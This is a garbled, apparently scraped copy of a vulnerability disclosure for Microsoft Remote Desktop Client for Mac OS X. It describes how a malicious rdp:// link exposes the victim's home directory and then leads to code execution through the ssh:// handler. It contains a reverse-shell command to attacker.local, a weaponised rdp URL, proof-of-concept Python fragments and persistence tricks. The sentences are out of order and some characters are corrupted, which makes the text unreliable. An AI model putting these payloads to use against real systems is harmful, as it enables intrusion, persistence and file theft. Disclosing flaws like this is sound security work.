poison “loginitems” to launch the URL at system startup.poison Safari “Application Saved State” so that the URL il launched at browser execuition.poison Safari cache adding some javascript that launches the URL.send the link to the victim via Mail or iMessage.To automatically execute the triggering URL (ssh://p) we can either: Nohup bash -i >& /dev/tcp/attacker.local/1234 0 &Īt this point any attempt to launch ssh://p will lead to the execution of ~/.ssh/command.sh without any warning. P ssh-rsa AAAAB3NzaC1yc2EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA To execute arbitrary code on the target machine we can use a trick that involves ssh and ssh:// URI handler.Ĭonsider the following example where the RDC exploit pushes the following files on the remote machine: Runcmd('copy c:\\REMOTE.txt c:\\home\\REMOTE\\REMOTE.txt') Runcmd('MKLINK /D C:\\home \\\\tsclient\\home') Process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
RDC link: rdp://full%20address=s:attacker.local&desktopwidth=i:200&desktopheight=i:200&audiomode=i:2&disable%20themes=i:1&screen%20mode%20id=i:1&devicestoredirect:s:*&drivestoredirect=s:*&redirectprinters=i:1&username=s:Administrator
To reproduce the issue follow the steps below: The following Proof Of Concept creates a directory on the victim’s home and puts a file into it.
REMOTE DESKTOP CLIENT FOR MAC OS X MAC OS X
Since Mac OS X by default opens rdp urls without confirmation (for example via Safari, Mail, Messages), a single click on a link it’s sufficient to trigger the vulnerability.Īccording to Microsoft, no CVE will be assigned due to the release model of this particular client. If an attacker can trick a user to open a malicious rdp url, he/she can read and write any file within the victim’s home directory. In the rdp url schema it’s possible to specify a parameter that will make the user’s home directory accessible to the server without any warning or confirmation request. The vulnerability exists to the way the application handles rdp urls.
REMOTE DESKTOP CLIENT FOR MAC OS X FOR MAC OS X
Microsoft Remote Desktop Client for Mac OS X (ver 8.0.32 and probably prior) allows a malicious Terminal Server to read and write any file in the home directory of the connecting user. User interaction is needed to exploit this issue, but a single click on a link (sent via mail, iMessage, etc.) is sufficient to trigger the vulnerability. A vulnerability exists in Microsoft Remote Desktop for Mac that allows a remote attacker to execute arbitrary code on the target machine.
0 kommentar(er)
